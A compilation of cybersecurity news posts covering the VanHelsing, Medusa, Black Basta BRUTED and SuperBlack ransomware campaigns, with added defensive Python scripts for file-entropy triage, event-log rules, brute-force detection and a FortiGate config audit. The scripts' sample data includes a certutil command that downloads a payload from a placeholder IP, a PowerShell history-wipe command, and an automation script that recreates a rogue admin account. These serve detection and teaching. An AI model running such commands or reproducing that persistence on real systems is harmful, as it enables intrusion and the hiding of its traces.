
VanHelsing Ransomware Strikes Windows ARM and ESXi Platforms

 


As part of ongoing tracking of ransomware-as-a-service (RaaS) operations, a new operation known as VanHelsing has been identified. It advertises a multi-platform capability: the ransomware is designed to compromise Windows, Linux, BSD, ARM and ESXi systems, which makes it an adaptable and dangerous threat.

During the spring of 2025, VanHelsing was heavily promoted to prospective affiliates on underground cybercriminal forums. The most notable aspect of the program is its pricing: experienced cybercriminals are admitted for free, while less experienced affiliates must pay a $5,000 deposit to participate. This tiered recruitment strategy appears calculated to attract both seasoned and aspiring threat actors and so widen the operation's reach.

Cybersecurity firm CYFIRMA first revealed the existence of VanHelsing a few weeks ago, providing insight into its emergence and early stages. Check Point Research's extensive technical analysis, published yesterday, builds on that discovery with a more in-depth account of the ransomware's mechanics and operational framework. It has become apparent that VanHelsingRaaS is spreading rapidly, raising serious concerns among security professionals.

Just two weeks after launch, three victims had already been confirmed. In that time the ransomware has also gone through further development and been released in a more advanced version. The speed of that development highlights how significant it could become in the threat landscape, and it warrants vigilance and proactive measures from security teams worldwide.

While the ransomware is still evolving, multiple infections have already been detected, which indicates that it is being deployed in real-world attacks. Researchers have examined several variants in depth; all of those seen so far are Windows builds. Each successive iteration has been improved incrementally, which suggests the malware is under continuous development.

The frequent updates and rapid progress show that the developers are committed to expanding the ransomware's capabilities, which raises concerns about its potential impact as it matures. According to the available evidence, VanHelsing was first detected in the wild on March 16. To encrypt files, the malware generates a fresh 32-byte (256-bit) symmetric key and a 12-byte nonce for each file and encrypts the file contents with the ChaCha20 stream cipher.

The per-file key and nonce are then encrypted with a Curve25519 public key embedded in the binary, and the encrypted values are stored in the affected file. Because only the operators hold the matching private key, the file key cannot be recovered from the victim's machine alone. Another notable feature of VanHelsing is its extensive command-line interface (CLI), which lets attackers tailor each run to the target environment.

Files larger than 1GB are partially encrypted, while smaller files are encrypted in full. The CLI options let the operator select which drives and folders to process, set encryption parameters, spread across the network via SMB, skip shadow-copy deletion, and run in a two-phase stealth mode. VanHelsing offers two encryption modes.

In the normal mode, the ransomware systematically enumerates directories, encrypts each file's contents, and renames the affected files with the ".vanhelsing" extension. In stealth mode, encryption and renaming are performed in separate passes: the encryption pass resembles ordinary file input/output (I/O) activity, which reduces the chance of detection.

Security tools may notice anomalies during the later renaming pass, but by then the data is already fully encrypted. Despite its advanced functionality and rapid evolution, Check Point also identified several shortcomings that point to immature development: inconsistent file extensions, flaws in the exclusion-list logic that could lead to files being encrypted twice, and several command-line flags that are not yet implemented.
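Both modes share one observable that does not depend on the rename: once the encryption pass has run, the file content is indistinguishable from random bytes, and for files over 1GB only part of the content changes. The following script is an added example written for this article, not code from Check Point Research or from VanHelsing itself. It triages files by the Shannon entropy of fixed-size chunks and reports whether a file looks untouched, fully encrypted, or partially encrypted. The chunk size, the 7.5 bits/byte threshold, and the sample files (repeated text, plus SHA-256-derived pseudo-random bytes standing in for ChaCha20 output) are assumptions made for the demonstration.

```python
"""Chunked-entropy triage for files hit by a full- or partial-encryption ransomware."""
import hashlib
import math
from collections import Counter

CHUNK = 4096          # assumption: triage granularity in bytes
HIGH_ENTROPY = 7.5    # assumption: bits/byte; stream-cipher output sits near 8.0, English text near 4-5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte of the given buffer (0.0 for an empty buffer)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes) -> tuple[str, float]:
    """Return (verdict, fraction of high-entropy chunks) for a file's bytes.

    'plaintext'           - no chunk looks encrypted
    'fully_encrypted'     - every chunk looks encrypted (the outcome for files under 1GB)
    'partially_encrypted' - a mix, as expected for large files encrypted only in part
    """
    chunks = [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)]
    if not chunks:
        return "empty", 0.0
    high = sum(1 for c in chunks if shannon_entropy(c) >= HIGH_ENTROPY)
    fraction = high / len(chunks)
    if fraction == 0.0:
        return "plaintext", fraction
    if fraction == 1.0:
        return "fully_encrypted", fraction
    return "partially_encrypted", fraction


def pseudo_ciphertext(length: int, seed: bytes = b"triage-demo") -> bytes:
    """Deterministic random-looking bytes (SHA-256 in counter mode) standing in for real
    ciphertext, so the sample runs offline and always yields the same result."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


# Constructed samples, not real victim files: 16 KiB each (four chunks).
PLAINTEXT = (b"Quarterly report: revenue up 4%.\n" * 600)[:CHUNK * 4]
FULLY_ENCRYPTED = pseudo_ciphertext(CHUNK * 4)
PARTIALLY_ENCRYPTED = pseudo_ciphertext(CHUNK * 2) + PLAINTEXT[CHUNK * 2:]   # first half encrypted


def triage_samples() -> dict[str, tuple[str, float]]:
    """Run the classifier over the three constructed samples, keyed by a made-up file name."""
    return {
        "report.docx": classify(PLAINTEXT),
        "report.docx.vanhelsing": classify(FULLY_ENCRYPTED),
        "archive.vhdx.vanhelsing": classify(PARTIALLY_ENCRYPTED),
    }


if __name__ == "__main__":
    for name, (verdict, fraction) in triage_samples().items():
        print(f"{name:28s} {verdict:20s} high-entropy chunks: {fraction:.0%}")
```

Run against a directory of recently modified files, the per-chunk fraction tells an incident responder which files were touched by the partial-encryption path and which were encrypted in full, independent of whether the stealth-mode rename pass ever completed. Compressed or already-encrypted formats (archives, media, encrypted databases) will also score as high entropy, so the verdict should be read together with the file type.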

Despite these technical imperfections, VanHelsing remains a formidable emerging threat. Because it is continuously evolving, security professionals and organizations must watch for activity associated with this variant as it develops. In summary, VanHelsing has emerged as a sophisticated, rapidly evolving ransomware that targets multiple platforms, including Windows, Linux, BSD, ARM, and ESXi.

With its per-file hybrid encryption, extensive CLI customization, and stealth tactics, this ransomware can be a formidable weapon in the hands of cybercriminals. Its promotion on underground forums and its recruitment strategy are strong evidence that it is being actively spread. Security researchers have noted that it is rapidly iterating and improving, making proactive defence measures imperative.

Although VanHelsing was developed with technical flaws, it remains a dangerous threat because of its ability to spread rapidly and adapt quickly. Organizations must maintain an effective cybersecurity strategy, stay informed about emerging threats, and strengthen their defences. The evolving nature of this ransomware emphasizes the need.

Cybercriminals Exploit Psychological Vulnerabilities in Ransomware Campaigns

 


In 2025 the cybersecurity landscape has changed drastically, with ransomware evolving from isolated incidents into a global crisis. These attacks now pose a serious threat to economies, governments, and public services worldwide, and organizations across every sector, from multinational corporations to hospitals and schools, find themselves exposed to increasingly sophisticated threats. Cohesity's Global Cyber Resilience Report found that 69% of organizations paid a ransom demand in the past year, an indication of how much pressure businesses face when such attacks happen.

That figure underscores the need for stronger cybersecurity measures, proactive threat mitigation, and a heightened focus on digital resilience. As cybercriminals continue to refine their tactics, organizations need to adopt new security frameworks, strengthen their threat intelligence capabilities, and foster a culture of cyber vigilance. A persistent threat for decades, ransomware remains one of the biggest risks today.

Global ransomware payments exceeded $1 billion for the first time in 2023, a milestone that marked a dramatic rise in cyber extortion as attackers refined their tactics to extract the maximum financial gain from victims. For several years the trend has been toward more sophisticated methods, wider exploitation of vulnerabilities, and harder pressure on organizations to comply. Recent data, however, shows a significant shift: ransomware payments fell by roughly 35% in 2024, largely because of successful law enforcement operations and improved cyber hygiene worldwide.

Enhanced security measures, increased awareness, and a stronger collective resistance have made victims more confident about refusing ransom demands. Cybercriminals, however, adapt quickly, altering their strategies to counter these evolving defences. Their response has been to sharpen their negotiation tactics, pressing victims to settle faster, while developing stealthier and more evasive ransomware strains.

Organizations are striving to strengthen their resilience, but the ongoing contest between defenders and cybercriminals continues to shape the future of digital security. A new phase of ransomware attacks is characterized by cybercriminals leveraging artificial intelligence in increasingly sophisticated ways. Freely available AI-powered chatbots are being used to generate malicious code, write convincing phishing emails, and even create deepfake videos that manipulate individuals into divulging sensitive information or transferring funds.

By lowering the barriers to entry, this allows even inexperienced threat actors to launch highly effective attacks. Artificial intelligence is not only being used by attackers, however. According to Sygnia's ransomware negotiation teams, there have been several cases in which victims tried to craft the perfect response to a ransom negotiation using AI-driven tools such as ChatGPT.

The limitations of AI become evident in high-stakes interactions with cybercriminals, even though it can be useful in many areas. According to Cristal, Sygnia's CEO, artificial intelligence lacks the emotional intelligence and nuance needed to navigate these sensitive conversations. AI-generated responses have sometimes unintentionally escalated a dispute by violating basic negotiation principles, such as avoiding negative language and never refusing to pay outright.

Human expertise therefore remains crucial in managing cyber extortion, where psychological insight and strategic communication play a vital role in limiting the damage. Earlier this year, the United Kingdom proposed banning ransomware payments, a move aimed at deterring cybercriminals by making critical industries less appealing targets. The proposed legislation would cover all public sector agencies, schools, local councils, data centres, and critical national infrastructure.

By reducing the financial incentive for attackers, officials hope to decrease both the frequency and severity of ransomware incidents across the country. The problem extends beyond the UK, however. In the United States, the Office of Foreign Assets Control has sanctioned several ransomware groups with links to Russia and North Korea, which makes it illegal for American businesses and individuals to pay ransoms to those organizations.

Even with payments restricted in this way, experts warn that outright bans are not a simple or universal solution. As cybersecurity specialists Segal and Cristal point out, the effectiveness of such bans remains uncertain, since attack volumes have been shown to fluctuate in response to policy changes. Some cybercriminals may be deterred by such policies, while others may escalate, turning to more aggressive threats or to extortion aimed at individuals.

Sygnia's negotiation team supports banning ransom payments in the government sector, while acknowledging that some ransomware groups are driven by geopolitical agendas and that those goals will be unaffected by payment restrictions. Even so, the team believes that government institutions should not be permitted to make ransom payments, because governments are better placed than private companies to absorb the financial losses.

Governments can afford a strong stance against paying ransoms, as Segal pointed out, but for businesses, especially small and micro-sized ones, the consequences of refusing can be devastating. The Home Office acknowledges this disparity in its policy proposal, noting that smaller companies, which often lack ransomware insurance or access to recovery services, can struggle to recover from the operational disruption and reputational damage a ransomware attack causes.

Some companies facing a prolonged attack may find it harder to resolve ransom demands and may turn to alternative, less transparent methods, such as covert payment through third parties or cryptocurrencies, which lets attackers receive the money anonymously and avoid legal consequences. The risks of such actions, however, are considerable: if discovered, businesses can face government fines on top of the ransom, further worsening their financial situation.

In addition, full compliance with a ban requires reporting incidents to the authorities, which can impose a significant administrative burden on small businesses, especially those less accustomed to dealing with technology. Given the many challenges businesses would face under a ransomware ban, experts believe a comprehensive support approach is needed.

Amir Becker, Sygnia's Senior Vice President of Global Cyber Services, stressed the importance of strategic measures to mitigate the unintended consequences of any ransom payment ban. Exemptions have been suggested for critical infrastructure and healthcare, where refusing to pay could have dire consequences, including loss of life. Governments should also create incentives for organizations to strengthen their cybersecurity frameworks and response strategies.

A comprehensive financial and technical assistance program would also be required to help affected businesses recover without resorting to ransom payments. To address the growing ransomware threat without disproportionately damaging small businesses and the broader economy, governments must adopt a balanced approach: enforcing stricter regulations while providing businesses with the resources they need to withstand attacks.

Authorities Warn Against Medusa Ransomware Surge

 

 
Federal agencies are urging individuals and organizations to stay vigilant against a ransomware threat that has affected hundreds of victims. The FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued an advisory detailing the tactics used by Medusa ransomware and how to mitigate its impact.

First identified in June 2021, Medusa is a ransomware-as-a-service (RaaS) variant that has targeted critical infrastructure sectors including healthcare, education, legal, insurance, technology, and manufacturing. Under the RaaS model, the ransomware's developers delegate attack execution to affiliates; as of February 2025, developers and affiliates had together impacted more than 300 victims.

Medusa initially operated as a closed ransomware variant, with the same group both developing the malware and carrying out attacks. It has since evolved into an affiliate-driven model, with the developers recruiting attackers on dark web forums and offering payouts of between $100 and $1 million per job.

Cybercriminals behind Medusa employ two primary attack vectors:
  • Phishing campaigns – Fraudulent emails trick users into downloading malicious attachments or clicking harmful links.
  • Exploiting unpatched vulnerabilities – Attackers take advantage of outdated software to infiltrate company networks.

Once inside, they rely on a range of legitimate tools to expand their access:

  • Advanced IP Scanner and SoftPerfect Network Scanner – Used for initial enumeration of users, systems, and the network, followed by scans for open ports and exploitable services.
  • PowerShell and the Windows command prompt – Used for network and file-system enumeration and to compile lists of targeted resources.
  • Remote access tools such as AnyDesk, Atera, and Splashtop – Used for lateral movement across the network.
  • PsExec – Executes files and commands on remote hosts with system-level privileges.

To avoid detection, the attackers often disable security tools using compromised or signed drivers. They also delete their PowerShell history and abuse the built-in Certutil utility to conceal their activity.
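Each of the tools above leaves a characteristic trace in Windows event logs. The following script is an added example for this post, not part of the joint advisory or of Medusa's tooling. It runs a handful of pattern rules over constructed event records shaped as (source, event ID, message) that mimic a Service Control Manager service-install event (ID 7045) and Sysmon process-creation events (ID 1). The records, the rule names, and the specific command lines are assumptions for the demonstration; a real deployment would feed the same rules parsed EVTX or SIEM output.

```python
"""Rule-based scan of Windows event records for the Medusa post-exploitation tooling above."""
import re

# Constructed sample records as (source, event_id, message); not real logs.
SAMPLE_EVENTS = [
    ("System", 7045, "A service was installed in the system. Service Name: PSEXESVC "
                     "Service File Name: %SystemRoot%\\PSEXESVC.exe"),
    ("Sysmon", 1, "CommandLine: certutil.exe -urlcache -split -f "
                  "http://203.0.113.10/update.bin C:\\Users\\Public\\update.bin"),
    ("Sysmon", 1, "CommandLine: powershell.exe -c Remove-Item (Get-PSReadlineOption).HistorySavePath"),
    ("System", 7045, "A service was installed in the system. Service Name: AnyDesk Service "
                     "Service File Name: \"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --service"),
    ("Sysmon", 1, "CommandLine: certutil.exe -hashfile C:\\installers\\setup.msi SHA256"),   # benign
    ("Sysmon", 1, "CommandLine: powershell.exe Get-ChildItem \\\\fileserver\\share -Recurse"),  # benign
]


def _msg_matches(pattern):
    """Build a predicate that matches a regex against the event message, case-insensitively."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda src, eid, msg: rx.search(msg) is not None


RULES = [
    # PsExec installs its PSEXESVC service on the target; the SCM logs that as event 7045.
    ("psexec_service_install",
     lambda src, eid, msg: src == "System" and eid == 7045 and "PSEXESVC" in msg.upper()),
    # certutil fetching or decoding payloads; plain hashing (-hashfile) is deliberately excluded.
    ("certutil_file_transfer", _msg_matches(r"certutil(\.exe)?\s.*-(urlcache|decode)\b")),
    # Deleting the PSReadline history file to hide what was typed in the console.
    ("powershell_history_wipe", _msg_matches(r"Remove-Item.*(HistorySavePath|ConsoleHost_history)")),
    # Remote-access tools named in the advisory appearing as services or processes.
    ("remote_access_tool", _msg_matches(r"\b(anydesk|atera|splashtop)\b")),
]


def scan(events):
    """Return (event index, rule name) for every rule that fires on each record, in log order."""
    hits = []
    for idx, (src, eid, msg) in enumerate(events):
        for name, predicate in RULES:
            if predicate(src, eid, msg):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

None of these rules is proof of compromise on its own: administrators legitimately install AnyDesk and run PsExec. The value is in the combination, so the output should be correlated by host and time window, and the certutil rule in particular should be tuned against the organisation's own baseline before it pages anyone.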

Like other ransomware strains, Medusa follows a double-extortion strategy: the attackers encrypt the victim's data and also threaten to publish the copies they stole if the ransom is not paid. Victims typically have 48 hours to respond, after which the attackers may contact them directly by phone or email.

The Medusa data leak site displays the ransom demand alongside a countdown timer. Victims who need more time can delay the data release by paying $10,000 in cryptocurrency per additional day. Meanwhile, the attackers may try to sell the stolen data to third parties even before the timer expires.

Federal authorities recommend the following preventative measures to reduce the risk of Medusa attacks:
  • Patch vulnerabilities – Keep all operating systems, software, and firmware updated.
  • Network segmentation – Prevent attackers from moving across connected systems.
  • Traffic filtering – Restrict access to internal services from untrusted sources.
  • Disable unused ports – Close unnecessary entry points to minimize security risks.
  • Backup critical data – Keep multiple copies of important files in an isolated location, such as offline storage, so that they survive an encryption event.
  • Enable multifactor authentication (MFA) – Secure all accounts, especially those used for webmail, VPNs, and critical systems.
  • Monitor network activity – Use security tools to detect unusual patterns and alert administrators to potential threats.

By implementing these strategies, organizations can significantly lower their chances of falling victim to Medusa ransomware and other evolving cyber threats.

Black Basta Hackers Use New Tool to Break Weak Passwords on Remote Systems

 



A cybercriminal group called Black Basta has built a new tool that helps it break into remote systems such as VPNs and firewalls by guessing weak passwords. The tool allows the group to target companies at scale and then demand ransom.

According to cybersecurity researchers, the tool, named BRUTED, automatically scans the internet for systems that might be easy to break into. It focuses on popular VPN and firewall products from vendors such as Cisco, Fortinet, and Palo Alto Networks, and it also attacks remote desktop services.

The tool gathers information such as IP addresses, subdomains, and details from TLS certificates to generate password guesses specific to each organization. It then sends login attempts disguised to look as though they come from a real user or device, which makes them harder to detect.

Because BRUTED runs automatically, it lets the attackers hit many targets quickly, which raises their chances of breaking in and profiting from ransomware attacks.

Experts warn that many companies still rely on simple or reused passwords, which makes their systems easy to compromise. In some cases attackers use leaked or default passwords that organizations forgot to change.

This poor password management exposes businesses to serious risk. Weak passwords may even have played a part in the leak of Black Basta's own data, when a hacker broke into a Russian bank and exposed the gang's private chats.

Black Basta is known for targeting important industries such as healthcare and manufacturing, where even a small disruption can cause major losses. Such organizations are more likely to pay a ransom to avoid a shutdown.

Security experts are urging businesses to act fast: use strong, unique passwords; change default settings; run regular security checks; and train employees in password safety.

Good password habits help prevent such attacks and protect critical systems from groups like Black Basta.


Ransomware Hackers Develop Advanced Tool for VPN Breaches

 


The Black Basta ransomware operation has developed an automated brute-force framework, referred to as BRUTED, that targets edge networking devices such as firewalls and VPN gateways. The tool lets the group breach vulnerable internet-facing endpoints efficiently and scale its ransomware attacks well beyond what manual intrusion would allow.

Researchers at EclecticIQ identified BRUTED while analyzing the gang's leaked internal chat logs. The logs show that Black Basta has used the tool since 2023 to run credential-stuffing and brute-force attacks against a range of remote access products, including SonicWall NetExtender, Palo Alto GlobalProtect, and Citrix NetScaler, highlighting the broad scope of the threat.

By automating brute-force attacks, Black Basta improves its operational efficiency and can probe exposed infrastructure more systematically. The discovery of BRUTED means organizations that rely on internet-connected security appliances face an even higher risk, as ransomware groups' tactics grow more sophisticated.

A recently published report by Arda Büyükkaya, a cyber threat intelligence analyst at EclecticIQ, confirms that Black Basta is using this previously unidentified brute-force framework. BRUTED is purpose-built to automate the compromise of enterprise VPNs and firewalls, significantly enhancing the group's ability to gain unauthorized access to corporate networks.

Multiple reports throughout 2024 documented extensive brute-force and password-spraying attacks against these kinds of devices. It is still unclear how those incidents relate to BRUTED or to other threat actors' operations; the matter remains under investigation. The tool nonetheless underlines the growing sophistication of ransomware tactics and the risk organizations take on when they depend on internet-connected security infrastructure.

Büyükkaya's analysis of the tool's source code shows that its primary functions are scanning the internet for edge network devices and running credential-stuffing attacks against them. Such devices are widely deployed in corporate environments as firewalls and VPN gateways. The name BRUTED comes from the tool's own log-naming conventions, and EclecticIQ researchers concluded that Black Basta uses it to perform large-scale credential-stuffing attacks. The group gains an initial foothold by exploiting weak or reused credentials, then moves laterally within the compromised network and ultimately deploys ransomware.

BRUTED also supports affiliates, who are responsible for initial access operations in ransomware campaigns, and so enhances the group's overall efficiency. Because the framework automates and scales attacks, it widens the victim pool and accelerates monetization. The discovery underlines how sophisticated cybercriminal tooling has become and the need for robust defences against it.

As Büyükkaya explained, BRUTED enables Black Basta affiliates to automate and scale their attacks, significantly increasing the number of victims they can target and boosting the monetization of their ransomware operations. The emergence of this brute-forcing tool shows that edge devices remain exposed, despite persistent warnings from private cybersecurity firms and government agencies about increased threats targeting VPN services. Even with those advisories, guessing passwords for firewalls and virtual private networks (VPNs) remains a lucrative attack vector for cybercriminals.

A Qualys blog post published some time ago similarly noted that Black Basta has gained initial access using default VPN credentials, brute-force attacks with stolen credentials, and other means. Abbasi, the manager of vulnerability research at the Qualys Threat Research Unit and a co-author of that report, asserted that weak passwords on VPNs and other publicly exposed services continue to pose a significant risk to organizations.

Abbasi further emphasized that the leaked Black Basta chat logs contained numerous simple or predictable credentials, demonstrating the persistent weaknesses that threat actors exploit to infiltrate corporate networks. With the BRUTED framework, threat actors can streamline their ransomware operations by attacking many networks at the same time with minimal effort.

That automation gives cybercriminals greater monetization opportunities and lets them scale their attacks more efficiently. The risks posed by such tools must be mitigated through strong cybersecurity practices. Organizations should enforce unique, strong passwords on all edge devices and VPNs, and multi-factor authentication (MFA) is essential because it adds a layer of protection that blocks unauthorized access even when credentials are compromised. Continuous network monitoring is also crucial for identifying potential threats.

Security teams should watch for authentication attempts from unfamiliar locations and flag high volumes of failed logins as an indicator of brute-force activity. Rate limiting and account-lockout policies reduce the effectiveness of credential-stuffing techniques. In response to the growing threat from BRUTED, EclecticIQ has published a list of IP addresses and domains associated with the framework.
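The monitoring described here, and in the shorter BRUTED post above, comes down to counting failures over a trailing time window along three different keys: per source address (a single host hammering the gateway, which is also the natural trigger for rate limiting), per account (the lockout decision), and across accounts (a low-and-slow spray that never trips either of the first two). The script below is an added example written for this article, not EclecticIQ's tooling or anything from Black Basta. The log-line format, the window length, and the thresholds are assumptions chosen for the demonstration, and the sample log is constructed; a real deployment would parse the VPN vendor's own authentication records.

```python
"""Sliding-window detection of brute-force, lockout-worthy and password-spray activity
in VPN authentication logs."""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Assumed log line format (constructed for this example, not any vendor's real format):
#   2025-03-10T09:00:01Z vpn auth FAILED user=jsmith src=198.51.100.7
LINE_RE = re.compile(
    r"^(?P<ts>\S+) vpn auth (?P<result>FAILED|OK) user=(?P<user>\S+) src=(?P<src>\S+)$")

WINDOW = timedelta(minutes=5)   # assumption: sliding window length
SRC_THRESHOLD = 10              # failures from one source in the window -> brute force / rate-limit
USER_THRESHOLD = 5              # failures against one account in the window -> lockout candidate
SPRAY_ACCOUNTS = 8              # distinct failing accounts with <= 2 failures each -> password spray


def parse(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect(lines):
    """Return (alert_kind, key) tuples, one per offender, in the order they first fire."""
    by_src = defaultdict(deque)     # failure timestamps per source address
    by_user = defaultdict(deque)    # failure timestamps per account
    recent = deque()                # (ts, user) of every failure in the window, for spray detection
    alerts, flagged = [], set()

    def fire(kind, key):
        if (kind, key) not in flagged:
            flagged.add((kind, key))
            alerts.append((kind, key))

    for line in lines:
        ev = parse(line)
        if not ev or ev["result"] != "FAILED":
            continue
        ts = ev["ts"]
        # Per-source and per-account counters over the trailing window.
        for key, dq, threshold, kind in (
            (ev["src"], by_src[ev["src"]], SRC_THRESHOLD, "brute_force_source"),
            (ev["user"], by_user[ev["user"]], USER_THRESHOLD, "lockout_candidate"),
        ):
            dq.append(ts)
            while ts - dq[0] > WINDOW:
                dq.popleft()
            if len(dq) >= threshold:
                fire(kind, key)
        # Spray: many accounts each failing only once or twice, from any number of sources.
        recent.append((ts, ev["user"]))
        while ts - recent[0][0] > WINDOW:
            recent.popleft()
        per_user = Counter(u for _, u in recent)
        if len(per_user) >= SPRAY_ACCOUNTS and max(per_user.values()) <= 2:
            fire("password_spray", "*")
    return alerts


def sample_log():
    """Constructed log: a single-source brute force, a benign typo followed by success,
    and a low-and-slow spray of eight accounts spread over six source addresses."""
    rows = [f"2025-03-10T09:00:{i:02d}Z vpn auth FAILED user=jsmith src=198.51.100.7"
            for i in range(12)]
    rows += ["2025-03-10T09:30:00Z vpn auth FAILED user=mlee src=203.0.113.40",
             "2025-03-10T09:30:20Z vpn auth OK user=mlee src=203.0.113.40"]
    accounts = ["admin", "vpn", "test", "backup", "guest", "itsupport", "scanner", "finance"]
    for i, user in enumerate(accounts):
        rows.append(f"2025-03-10T10:{(i * 20) // 60:02d}:{(i * 20) % 60:02d}Z "
                    f"vpn auth FAILED user={user} src=198.51.100.{20 + i % 6}")
    return rows


if __name__ == "__main__":
    for kind, key in detect(sample_log()):
        print(f"{kind}: {key}")
```

The spray rule is the one that matters against a tool like BRUTED: by rotating source addresses and trying only one or two candidate passwords per account, it stays under both the per-source and per-account thresholds, so a detector that only counts those two keys never fires. Feeding the same counters into the gateway's rate-limit and lockout policy closes the loop from detection to mitigation.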

Such indicators can be used to update firewall rules so that requests from known malicious infrastructure are blocked, limiting the tool's reach. BRUTED does not exploit software vulnerabilities to gain access to edge devices, but keeping security patches up to date remains an important part of defence: regularly applying the latest patches closes other weaknesses in network security systems and strengthens overall resilience.

New Ransomware 'SuperBlack' Abuses Fortinet Firewall Flaws to Launch Attacks

 


A newly identified threat actor tracked as Mora_001 is carrying out attacks by exploiting security weaknesses in Fortinet firewalls. The group deploys a custom ransomware strain named SuperBlack to encrypt victims' data and hold it for ransom.

The attackers take advantage of two authentication bypass flaws in Fortinet devices, tracked as CVE-2024-55591 and CVE-2025-24472, which Fortinet disclosed earlier this year. Reports indicate that one of these vulnerabilities was being exploited in the wild before the company officially disclosed it.

Fortinet initially stated that only one of the two bugs had been exploited. A recent investigation, however, suggests that the second vulnerability was also being exploited during the same period. Researchers from cybersecurity firm Forescout uncovered this while examining attacks that occurred in January and February 2025.


Step-by-Step Breakdown of the Attack

The cybercriminals begin their attack by finding exposed Fortinet firewall devices that haven’t been updated. They then use these security flaws to gain full control over the system.

Once inside, the attackers grant themselves the highest level of access, commonly known as 'super admin' rights. They either use web-based tools or direct network requests to make these changes.

After securing control, they create new administrator profiles with names like forticloud-tech, fortigate-firewall, or adnimistrator. These fake accounts are set up in a way that even if someone deletes them, automated tasks will recreate them instantly.

The hackers then scan the network to understand its layout and start moving from one system to another. They use stolen login details, create new VPN accounts, and rely on common tools like WMIC and SSH to spread across connected machines. They also try to break into systems that use security checks like TACACS+ or RADIUS.

Before locking files, the group copies important data using their own tools. Their main targets include file storage systems, database servers, and computers that control user access across networks. Once the data is stolen, the ransomware is triggered, encrypting files and leaving ransom messages behind.

To hamper later investigation, the attackers run a program called 'WipeBlack', which removes traces of the ransomware from the system and leaves little evidence.
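A practical check for the persistence pattern described in the steps above is to audit the firewall's configuration dump rather than the live admin list, because the automation task that recreates the accounts is itself visible in the config. The script below is an added example, not code from the article or from Forescout: it parses a constructed FortiOS-style `show` output (the exact shape of the dump, the `system automation-action` section and the `KNOWN_ADMINS` inventory are assumptions for illustration) and flags privileged accounts that are not in the inventory, look-alike names such as adnimistrator, and CLI-script automation actions that edit admin accounts.

```python
"""Audit a FortiGate CLI configuration dump for the SuperBlack persistence pattern:
unexpected super_admin accounts, look-alike admin names, and automation actions whose
CLI script re-creates an admin account. Added example; FortiOS dump shape is assumed."""
import difflib
import re

# Constructed sample in FortiOS 'show' format (shape assumed; not taken from the article).
# The account names mirror the ones the post lists.
SAMPLE_CONFIG = '''\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
    next
    edit "forticloud-tech"
        set accprofile "super_admin"
        set vdom "root"
    next
    edit "adnimistrator"
        set accprofile "super_admin"
        set vdom "root"
    next
    edit "helpdesk-ro"
        set accprofile "read_only"
        set vdom "root"
    next
end
config system automation-action
    edit "recreate-admin"
        set action-type cli-script
        set script "config system admin
edit forticloud-tech
set accprofile super_admin
next
end"
    next
    edit "notify-soc"
        set action-type email
    next
end
'''

# Accounts the organisation actually provisioned (assumed inventory).
KNOWN_ADMINS = {"admin"}
PRIVILEGED_PROFILES = {"super_admin"}


def _logical_lines(text):
    """Yield config lines, joining a quoted value (such as a CLI script) that spans
    several physical lines so the script body is not mistaken for config structure."""
    buf = None
    for raw in text.splitlines():
        if buf is not None:
            buf += "\n" + raw
            if raw.rstrip().endswith('"'):
                yield buf
                buf = None
        elif raw.count('"') % 2 == 1:   # opening quote with no close on this line
            buf = raw
        else:
            yield raw
    if buf is not None:                 # unterminated quote: emit what we have
        yield buf


def parse_fortios(text):
    """Parse top-level 'config <section>' blocks into {section: {entry: {key: value}}}."""
    sections, stack, entry = {}, [], None
    for line in _logical_lines(text):
        s = line.strip()
        if s.startswith("config "):
            stack.append(s[len("config "):])
            sections.setdefault(stack[-1], {})
        elif s.startswith("edit "):
            entry = s[len("edit "):].strip().strip('"')
            sections[stack[-1]][entry] = {}
        elif s.startswith("set ") and entry is not None:
            key, _, value = s[len("set "):].partition(" ")
            sections[stack[-1]][entry][key] = value.strip().strip('"')
        elif s == "next":
            entry = None
        elif s == "end" and stack:
            stack.pop()
    return sections


def audit(sections, known_admins=KNOWN_ADMINS):
    """Return a list of (finding, entry_name) tuples."""
    findings = []
    for name, attrs in sections.get("system admin", {}).items():
        if attrs.get("accprofile") in PRIVILEGED_PROFILES and name not in known_admins:
            findings.append(("unexpected privileged admin", name))
        # Look-alike names such as 'adnimistrator' are designed to survive a quick visual review.
        if name not in known_admins and \
                difflib.SequenceMatcher(None, name.lower(), "administrator").ratio() > 0.8:
            findings.append(("look-alike admin name", name))
    for name, attrs in sections.get("system automation-action", {}).items():
        if attrs.get("action-type") == "cli-script" and \
                re.search(r"config\s+system\s+admin", attrs.get("script", "")):
            findings.append(("automation action recreates admin accounts", name))
    return findings


if __name__ == "__main__":
    for finding, name in audit(parse_fortios(SAMPLE_CONFIG)):
        print(f"{finding}: {name}")
```

Run against a real dump, the inventory in `KNOWN_ADMINS` is the important input: the account names in the post are only examples, and the next campaign will pick different ones, so the check is "privileged account I did not provision", not a name list.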


Possible Links to a Bigger Ransomware Group

During their investigation, Forescout found that SuperBlack ransomware shares several similarities with the well-known LockBit ransomware group. The coding style and methods used appear to have been copied from LockBit’s earlier leaked tools.

However, it looks like SuperBlack is being operated separately and is not officially part of the LockBit group.

This incident is a reminder of the risks that come with outdated software. Organizations using Fortinet firewalls should install security updates immediately to avoid falling victim to such attacks. Staying updated is crucial in protecting sensitive information from advanced ransomware threats.



Sunflower and CCA Suffer Data Breaches, Exposing Hundreds of Thousands of Records

 

Sunflower recently disclosed a cyberattack on its systems, revealing that hackers gained access on December 15 but remained undetected until January 7. 

